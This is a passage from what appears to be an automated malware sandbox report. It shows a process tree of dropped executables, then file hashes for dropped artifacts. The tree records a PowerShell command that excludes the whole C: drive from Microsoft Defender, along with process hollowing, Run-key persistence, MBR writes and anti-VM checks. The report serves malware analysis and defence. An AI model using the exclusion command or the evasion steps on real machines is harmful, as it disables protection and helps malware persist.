                                        • C:\Users\Admin\AppData\Local\Temp\10491950101\e9ff9c3a5a.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10491950101\e9ff9c3a5a.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          PID:6028
                                        • C:\Users\Admin\AppData\Local\Temp\10491960101\a31e3b2417.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10491960101\a31e3b2417.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:1196
                                        • C:\Users\Admin\AppData\Local\Temp\10491970101\10f280b706.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10491970101\10f280b706.exe"
                                          6⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • System Location Discovery: System Language Discovery
                                          PID:5428
                                        • C:\Users\Admin\AppData\Local\Temp\10491980101\Pgpx359.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10491980101\Pgpx359.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          PID:6096
                                        • C:\Users\Admin\AppData\Local\Temp\10491990101\YSdglTu.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10491990101\YSdglTu.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:5588
                                          • C:\Users\Admin\AppData\Local\Temp\10491990101\YSdglTu.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10491990101\YSdglTu.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:392
                                        • C:\Users\Admin\AppData\Local\Temp\10492000101\5LlBAvp.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10492000101\5LlBAvp.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:5728
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                            7⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4544
                                        • C:\Users\Admin\AppData\Local\Temp\10492010101\ibC8xs1.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10492010101\ibC8xs1.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Suspicious use of SetThreadContext
                                          PID:4584
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yweaj5ti\yweaj5ti.cmdline"
                                            7⤵
                                              PID:4768
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4C32.tmp" "c:\Users\Admin\AppData\Local\Temp\yweaj5ti\CSCFCC3A98BC67C4C3AB439748E47B3BDDC.TMP"
                                                8⤵
                                                  PID:4116
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                7⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3704
                                            • C:\Users\Admin\AppData\Local\Temp\10492020101\DgQBvwg.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10492020101\DgQBvwg.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              • Suspicious use of SetThreadContext
                                              PID:5556
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\13ccdy5m\13ccdy5m.cmdline"
                                                7⤵
                                                  PID:6136
                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5C30.tmp" "c:\Users\Admin\AppData\Local\Temp\13ccdy5m\CSC6652D1F6AE054734A6D466CC6824DE.TMP"
                                                    8⤵
                                                      PID:6124
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                    7⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5528
                                                • C:\Users\Admin\AppData\Local\Temp\10492030101\UZPt0hR.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10492030101\UZPt0hR.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: MapViewOfSection
                                                  PID:5984
                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                    cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                    7⤵
                                                      PID:3304
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                        8⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        PID:1424
                                                    • C:\Windows\system32\svchost.exe
                                                      "C:\Windows\system32\svchost.exe"
                                                      7⤵
                                                      • Downloads MZ/PE file
                                                      • Adds Run key to start application
                                                      PID:2780
                                                      • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:6116
                                                      • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                        8⤵
                                                        • Deletes itself
                                                        • Executes dropped EXE
                                                        PID:5520
                                                        • C:\Users\Admin\AppData\Local\Temp\{13c64baf-8662-484a-a650-0957176873d4}\65086ede.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\{13c64baf-8662-484a-a650-0957176873d4}\65086ede.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                          9⤵
                                                          • Executes dropped EXE
                                                          • Checks for VirtualBox DLLs, possible anti-VM trick
                                                          • System Location Discovery: System Language Discovery
                                                          PID:9280
                                                          • C:\Users\Admin\AppData\Local\Temp\{9983d2eb-b721-416b-8761-8fdc56014a69}\dfe9b371.exe
                                                            C:/Users/Admin/AppData/Local/Temp/{9983d2eb-b721-416b-8761-8fdc56014a69}/\dfe9b371.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                            10⤵
                                                            • Drops file in Drivers directory
                                                            • Sets service image path in registry
                                                            • Executes dropped EXE
                                                            • Impair Defenses: Safe Mode Boot
                                                            • Loads dropped DLL
                                                            • Adds Run key to start application
                                                            • Writes to the Master Boot Record (MBR)
                                                            • Checks for VirtualBox DLLs, possible anti-VM trick
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: LoadsDriver
                                                            PID:5428
                                                  • C:\Users\Admin\AppData\Local\Temp\10492040101\larBxd7.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10492040101\larBxd7.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:14176
                                                  • C:\Users\Admin\AppData\Local\Temp\10492050101\72795d1f06.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10492050101\72795d1f06.exe"
                                                    6⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Writes to the Master Boot Record (MBR)
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    PID:6540
                                                  • C:\Users\Admin\AppData\Local\Temp\10492060101\9sWdA2p.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10492060101\9sWdA2p.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:7116
                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10492070271\ArFLIYD.msi" /quiet
                                                    6⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5640
                                                  • C:\Users\Admin\AppData\Local\Temp\10492080101\AfkeY2q.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10492080101\AfkeY2q.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:11044
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                          1⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:1892
                                          • C:\Windows\explorer.exe
                                            explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                            2⤵
                                              PID:980
                                          • C:\Windows\explorer.exe
                                            C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                            1⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:392
                                            • C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                              "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of WriteProcessMemory
                                              PID:1272
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0wxwmv22\0wxwmv22.cmdline"
                                                3⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:1416
                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES266F.tmp" "c:\Users\Admin\AppData\Local\Temp\0wxwmv22\CSC255BE67223D74B7695ED876B31CCE21.TMP"
                                                  4⤵
                                                    PID:548
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                  3⤵
                                                    PID:888
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4248
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                1⤵
                                                  PID:1208
                                                  • C:\Windows\explorer.exe
                                                    explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                    2⤵
                                                      PID:3236
                                                  • C:\Windows\system32\msiexec.exe
                                                    C:\Windows\system32\msiexec.exe /V
                                                    1⤵
                                                    • Enumerates connected drives
                                                    • Drops file in Windows directory
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3152
                                                    • C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe
                                                      "C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1008
                                                      • C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
                                                        C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of SetThreadContext
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:4420
                                                        • C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
                                                          C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
                                                          4⤵
                                                          • Loads dropped DLL
                                                          PID:4084
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\SysWOW64\cmd.exe
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:5248
                                                    • C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe
                                                      "C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2732
                                                      • C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
                                                        C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:9032
                                                  • C:\Windows\explorer.exe
                                                    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                    1⤵
                                                      PID:4156
                                                      • C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                        "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:4616
                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pexoxxs1\pexoxxs1.cmdline"
                                                          3⤵
                                                            PID:5028
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              4⤵
                                                                PID:3236
                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7819.tmp" "c:\Users\Admin\AppData\Local\Temp\pexoxxs1\CSCCBE2B6E3F4BD4614A1B71E7A59A1636B.TMP"
                                                                4⤵
                                                                  PID:4952
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                3⤵
                                                                  PID:1200
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3080
                                                            • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                              "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                              1⤵
                                                                PID:1508
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                1⤵
                                                                  PID:4988
                                                                • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                  1⤵
                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                  • Checks BIOS information in registry
                                                                  • Executes dropped EXE
                                                                  • Identifies Wine through registry keys
                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                  PID:6116
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                  1⤵
                                                                    PID:3008
                                                                    • C:\Windows\explorer.exe
                                                                      explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                      2⤵
                                                                        PID:5256
                                                                    • C:\Windows\explorer.exe
                                                                      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                      1⤵
                                                                        PID:5276
                                                                        • C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                          "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:3088
                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\keo0zyvl\keo0zyvl.cmdline"
                                                                            3⤵
                                                                              PID:4608
                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES573E.tmp" "c:\Users\Admin\AppData\Local\Temp\keo0zyvl\CSCD5957FF8AD664E308AE04D6B2FF14B22.TMP"
                                                                                4⤵
                                                                                  PID:3924
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:5864
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                            1⤵
                                                                              PID:5696
                                                                              • C:\Windows\explorer.exe
                                                                                explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                                2⤵
                                                                                  PID:3544
                                                                              • C:\Windows\explorer.exe
                                                                                C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                1⤵
                                                                                  PID:5368
                                                                                  • C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:5692
                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\auoxkrg0\auoxkrg0.cmdline"
                                                                                      3⤵
                                                                                        PID:1236
                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6EAE.tmp" "c:\Users\Admin\AppData\Local\Temp\auoxkrg0\CSCB2A8A9003624102986E42DE5623F633.TMP"
                                                                                          4⤵
                                                                                            PID:5572
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                          3⤵
                                                                                            PID:6096
                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                            3⤵
                                                                                              PID:3676
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              3⤵
                                                                                                PID:5608
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                3⤵
                                                                                                  PID:1504
                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                  3⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:4920
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                              1⤵
                                                                                                PID:3640
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                1⤵
                                                                                                  PID:5960
                                                                                                • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                  1⤵
                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Executes dropped EXE
                                                                                                  • Identifies Wine through registry keys
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:13840
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{ad191732-16cd-4bbe-8b10-aeb710ea48c9}\22673f59-a95e-41d9-b9a7-ef07a0444460.cmd"ÿ
                                                                                                  1⤵
                                                                                                    PID:10836

                                                                                                  Network

                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                  Replay Monitor

                                                                                                  Loading Replay Monitor...

                                                                                                  Downloads

                                                                                                  • C:\Config.Msi\e5869e3.rbs

                                                                                                    Filesize

                                                                                                    8KB

                                                                                                    MD5

                                                                                                    8cc7df421ccb9f214a7beb04e056988f

                                                                                                    SHA1

                                                                                                    377bc398f981f415e1351c5722db081075b01fbd

                                                                                                    SHA256

                                                                                                    22d048608ae5c5ce7708c29b88a47421d85295c42b359a2ae56e791b1be27739

                                                                                                    SHA512

                                                                                                    8ebf8aa752ba859fff17c609aa76673ebbb4ad6abece206268e4dc82e23e8c6a76d8618b92e7fbc8b552df71dcafab8e9976cdb4dc33d2980f3f7c9962a69abd

                                                                                                  • C:\Config.Msi\e5869e7.rbs

                                                                                                    Filesize

                                                                                                    3KB

                                                                                                    MD5

                                                                                                    2b9ff8a02d598cb9bde6ba1e89d2073c

                                                                                                    SHA1

                                                                                                    293fdbde07c1d4c1833b459f5beb0a83c4ab5bce

                                                                                                    SHA256

                                                                                                    45e93f878e752615cc76273791060b68201b2ac970954aa74192337876dbf5a2

                                                                                                    SHA512

                                                                                                    510df9735ef9ed42a6433b2d076e3cef83dd5c7f6843566ebf18c0500757beeb72aa69f863af976d07f901f5d34bfdd87938aa9a5e92290298ba11eb94f9bf51

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                    Filesize

                                                                                                    2B

                                                                                                    MD5

                                                                                                    d751713988987e9331980363e24189ce

                                                                                                    SHA1

                                                                                                    97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                    SHA256

                                                                                                    4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                    SHA512

                                                                                                    b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                    Filesize

                                                                                                    80KB

                                                                                                    MD5

                                                                                                    460d6c9a84b1f07055e67050947f68a4

                                                                                                    SHA1

                                                                                                    63db5a5551bd063180ff46e8849995e58d52eb18

                                                                                                    SHA256

                                                                                                    258cbfc58a2852f12bf4aa410763a45e4c5bce5c2cca2a23cdab9377f6e358b4

                                                                                                    SHA512

                                                                                                    816bc899d7354c6e0e9593b616d086722c0e429e02f5384bff71ddf4644c1df2a95fdbced3a325eba44bca34db48ee0a6c7597b491fd0ab9108048982eb566da

                                                                                                  • C:\Users\Admin\AppData\Local\Insulin\bugbane.tar

                                                                                                    Filesize

                                                                                                    67KB

                                                                                                    MD5

                                                                                                    456db093dd51927325ee689f07497956

                                                                                                    SHA1

                                                                                                    2524317a67d840e4d96ab31a7ab6989655973713

                                                                                                    SHA256

                                                                                                    1a61a0a00095762db7ca2fddb238d6c53979717259bf22a271d7711cb8e8f7d4

                                                                                                    SHA512

                                                                                                    578c769d55034e3b341d75bb8f1f00e47d18bd3c5692d81e986bdd4911117cb0c4499b082c251c84cdc74e08c5615702cc7dfd73b583043b2de6015b3fd5ba5b

                                                                                                  • C:\Users\Admin\AppData\Local\Insulin\saliency.mp4

                                                                                                    Filesize

                                                                                                    4.3MB

                                                                                                    MD5

                                                                                                    f0190ef82225079af7af373399b851e5

                                                                                                    SHA1

                                                                                                    0cecbd808aa1b7fb71fc4855c7fc6d413ce3c8e0

                                                                                                    SHA256

                                                                                                    36d823dcd2df7edfaad58339c163317eff508636815de4ace5e6e7aefa74d0ec

                                                                                                    SHA512

                                                                                                    9461c1cfb123aa4cd417db20e9892600efbee4dc662399e4a9aba7605d80c32037c3e0c707bac7e843d88ab404c030c12351b178489d0b94a8d24c51197092d8

                                                                                                  • C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe

                                                                                                    Filesize

                                                                                                    560KB

                                                                                                    MD5

                                                                                                    dc1681b98049f1df46dd10d7f4c26045

                                                                                                    SHA1

                                                                                                    4c7f5cf7c00b6139979f8aa41f46979666369224

                                                                                                    SHA256

                                                                                                    594f9853124e0a81deeaaecb8ec3d192169e7393778214ef6d8f6460450ef080

                                                                                                    SHA512

                                                                                                    c9a2086326acbab8aba801da0d8bd2aa06951ec7fd7f32a3150f9521498c0b6711552695fbf9d0de7668503630c508bcd68e1d715796ef34f9945035da3fe1ed

                                                                                                  • C:\Users\Admin\AppData\Local\Insulin\tier0_s.dll

                                                                                                    Filesize

                                                                                                    341KB

                                                                                                    MD5

                                                                                                    884013332bf332e4dd8cbf0109a8cfeb

                                                                                                    SHA1

                                                                                                    c01789d661d465ca29d20174d8f5d29afb1fcffa

                                                                                                    SHA256

                                                                                                    8ed104f6d7a50f95d515005bf6bd5569cd2dc0107119aa3d91e21dd7ba777e98

                                                                                                    SHA512

                                                                                                    ea18f416b1295edcfc197c685d56030246097bf95ffffa46f13a16753d05d95a1adb83b5ba0669eaa1049856ea2486ca0fc49507df7d41572de80701e9852f64

                                                                                                  • C:\Users\Admin\AppData\Local\Insulin\vstdlib_s.dll

                                                                                                    Filesize

                                                                                                    519KB

                                                                                                    MD5

                                                                                                    e72abad31c8da5ef51f9d9f253ffbf8e

                                                                                                    SHA1

                                                                                                    b516ca096b5f9d4f5e899a42b57c1358469f9511

                                                                                                    SHA256

                                                                                                    745c63df892ca8cd0c59edc7400df6a7399240d8ee7f73b8025f6c327fc187f6

                                                                                                    SHA512

                                                                                                    5c0696b4e15c15c4022d41c889f5ba304d1d698f9da0f23691fdeb88851195bdf8ee10e3b755a6fb4781af23d8393f1e22350806fc50ebc97e4ec1e53ab76188

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\exp.exe.log

                                                                                                    Filesize

                                                                                                    633B

                                                                                                    MD5

                                                                                                    043a3f7769ea45be84cb4c60761c6a71

                                                                                                    SHA1

                                                                                                    cdce7657f5026424e5a56963551e5857b0111bb1

                                                                                                    SHA256

                                                                                                    d9fcde1d11472b92a9ee9936baeda9081080e80d66c06871423455877b4f8c30

                                                                                                    SHA512

                                                                                                    63a7a7dc33cf131923c0cbf0dac5f21af8fef312a6a78b69173a42b164557cc6aa084ed4be6b66c87bfe899eef995defb7044c3d40ce5616a11d12ead2bb6064

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                    Filesize

                                                                                                    280B

                                                                                                    MD5

                                                                                                    fed4ab68611c6ce720965bcb5dfbf546

                                                                                                    SHA1

                                                                                                    af33fc71721625645993be6fcba5c5852e210864

                                                                                                    SHA256

                                                                                                    c41acdf5d0a01d5e9720ef9f6d503099950791b6f975ba698ccd013c4defa8c4

                                                                                                    SHA512

                                                                                                    f9ab23b3b4052f7fda6c9a3e8cd68056f21da5d0fcf28061331900cac6f31ef081705804d9a9d4103ee7d9c9bdb6aa4237987b7e821d2d96cd52da24219e55ee

                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                    Filesize

                                                                                                    280B

                                                                                                    MD5

                                                                                                    4013ebc7b496bf70ecf9f6824832d4ae

                                                                                                    SHA1

                                                                                                    cfdcdac5d8c939976c11525cf5e79c6a491c272a

                                                                                                    SHA256

                                                                                                    fb1a67bdc2761f1f9e72bbc41b6fc0bf89c068205ffd0689e4f7e2c34264b22a

                                                                                                    SHA512

